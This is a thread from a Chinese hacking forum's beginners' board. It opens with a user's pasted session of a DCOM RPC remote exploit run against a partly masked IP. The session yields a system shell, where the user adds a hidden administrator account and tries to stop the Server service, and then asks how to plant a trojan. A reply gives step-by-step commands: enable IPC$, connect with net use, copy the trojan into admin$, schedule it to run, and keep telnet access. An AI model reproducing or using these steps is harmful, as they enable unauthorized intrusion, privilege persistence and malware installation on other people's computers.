论坛: 菜鸟乐园 标题: 请教版主一个IPC溢出的问题。 复制本贴地址    
作者: yz5263 [yz5263]    论坛用户   登录
F:\1>dcomrpc -d 210.58.xxx.xxx 0
RPC DCOM remote expl01t - .:[oc192.us]:. Security
Complied and recorrected by Expl01t www.longker.com
[+] Resolving host..
[+] Done.
[+] Expl01ting....Just wait......
[+] If You See This Line.The Expl01t Works...Cheer!

-- Oh Baby,Here Comes The Shell! --

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.

C:\WINNT\system32>net user abc 123 /add
net user abc 123 /add
命令成功完成。


C:\WINNT\system32>net localgroup administrators abc /add
net localgroup administrators abc /add
命令成功完成。


C:\WINNT\system32>NET STOP SERVER
NET STOP SERVER
下面的服务依赖于 Server 服务。
停止 Server 服务也会停止这些服务。

   Computer Browser

是否继续此操作? (Y/N) [N]:
没有提供有效的响应。

怎么种植木马呢?

地主 发表时间: 08/11 13:31

回复: all528 [all528]   论坛用户   登录
汗~老兄你够高级啊 我还没用这种自设置的dcomrpc了 呵呵 一般我用的是反向连接
你在运行上面的命令以后
要打开他的IPC$
NET START LANMANSERVER
NET SHARE IPC$
然后另开个CMD对他进行NET USE 连接
net use \\ip\ipc$ "密码" /user:"administrator"
进行IPC$连接以后 在将木马复制到他的winnt目录下
copy 木马 \\IP\admin$
然后随便设定个时间让他启动就可以啦
本来是不想写的 因为老大不要求发入侵之类的文章
但是看你那么认真学相信你也不会做坏事就打出来啦 还有告诉你一下就是凡是溢出的系统都不稳定在入侵后最好升完权限就能个telnet保险一点 在不明白的话我也不知道啦 个人认为学学基础好些

B1层 发表时间: 08/11 13:43

回复: yz5263 [yz5263]   论坛用户   登录
谢谢老大!

B2层 发表时间: 08/11 20:48

回复: yufirst [yufirst]   论坛用户   登录
请问这个益处具体是怎么回事啊?在下实不知啊!

B3层 发表时间: 08/11 21:39

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号